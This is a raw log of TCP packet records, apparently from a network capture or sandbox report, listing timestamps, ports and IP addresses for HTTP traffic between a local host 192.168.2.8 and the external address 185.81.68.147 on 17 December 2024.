                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.903171062 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.903999090 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.904107094 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.904107094 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.904941082 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.904995918 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.905081987 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.905898094 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.906044960 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.906045914 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.907074928 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.907109976 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.907150030 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.907851934 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.907905102 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.907991886 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.908766031 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.908839941 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.908950090 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.909704924 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.909769058 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.909838915 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.910672903 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.910793066 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.910826921 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.911638021 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.911767960 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.911874056 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.912597895 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.912687063 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.912688971 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.913563013 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.913633108 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.913675070 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.914513111 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.914642096 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.914762020 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.915426970 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.915544033 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.915581942 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.916362047 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.916423082 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.916460037 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.917381048 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.917432070 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.917572021 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.918301105 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.918365002 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.918378115 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.919233084 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.919287920 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.919287920 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.973253965 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.081744909 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.081779003 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.081790924 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.081882954 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.081896067 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.081984043 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.081995964 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.082063913 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.082098961 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.082108974 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.082241058 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.082241058 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.082241058 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.082241058 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.082369089 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.082380056 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.082396984 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.082407951 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.082417965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.082427979 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.082686901 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.082706928 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.082716942 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.082727909 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.082737923 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.082747936 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.082760096 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.082796097 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.082796097 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.082797050 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.083008051 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.083019972 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.083029985 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.083062887 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.083074093 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.083206892 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.083216906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.083228111 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.083239079 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.083249092 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.083260059 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.083265066 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.083270073 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.083281040 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.083283901 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.083283901 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.083283901 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.083283901 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.083283901 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.083345890 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.083345890 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.083789110 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.083801031 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.083811998 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.083822966 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.083833933 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.084009886 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.084031105 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.084312916 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.084312916 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.084314108 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.087434053 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.087487936 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.087500095 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.087631941 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.087642908 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.087655067 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.087666035 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.087717056 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.087733984 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.087763071 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.087831020 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.087923050 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.087934017 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.087975979 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.088319063 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.088453054 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.089298964 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.089413881 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.089488029 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.089488029 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.089488029 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.090233088 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.090372086 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.091178894 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.091257095 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.091325045 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.091325045 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.092144012 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.092252016 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.092818022 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.093107939 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.093367100 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.093951941 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.094064951 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.094145060 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.094331026 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.095021009 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.095082045 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.095333099 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.095966101 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.096117973 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.096962929 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.097125053 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.097234011 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.097839117 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.098021030 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.098813057 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.098915100 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.098989010 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.098989010 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.098989010 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.099788904 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.099914074 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.100152016 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.100718021 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.100889921 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.100972891 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.101706982 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.101845980 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.102627039 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.102719069 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.103336096 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.103336096 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.103858948 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.103919983 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.104110003 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.105144024 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.105279922 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.105952024 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.106261015 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.106378078 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.107028961 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.107197046 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.107387066 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.107387066 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.107952118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.108077049 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.108259916 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.108686924 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.108767033 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.108844995 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.109481096 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.109534979 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.109603882 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.110328913 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.110460043 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.110524893 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.111666918 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.111855984 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.111938000 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.112973928 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.113079071 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.113152981 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.113897085 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.160536051 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.255280972 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.255357027 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.255470991 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.255776882 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.255803108 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.255985022 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.256668091 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.256767035 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.256984949 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.257616997 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.257698059 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.257816076 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.258583069 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.258717060 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.258795023 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.259655952 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.260576963 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.260754108 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.260756969 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.260912895 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.261007071 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.261507988 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.261626005 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.261862993 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.262471914 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.262625933 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.262907028 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.263451099 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.263600111 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.264039993 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.264499903 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.264574051 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.264734030 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.265278101 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.265403986 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.265651941 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.266338110 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.266494036 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.266701937 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.267575026 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.267705917 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.267992973 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.268335104 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.268419027 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.268568039 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.269346952 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.269537926 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.270183086 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.270273924 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.270394087 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.270394087 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.271025896 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.271287918 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.271358967 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.271996975 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.272110939 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.272552013 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.272996902 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.273145914 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.273581028 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.274154902 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.274285078 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.274643898 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.275000095 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.275156021 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.275269032 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.276338100 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.276458025 CET8049709185.81.68.147192.168.2.8
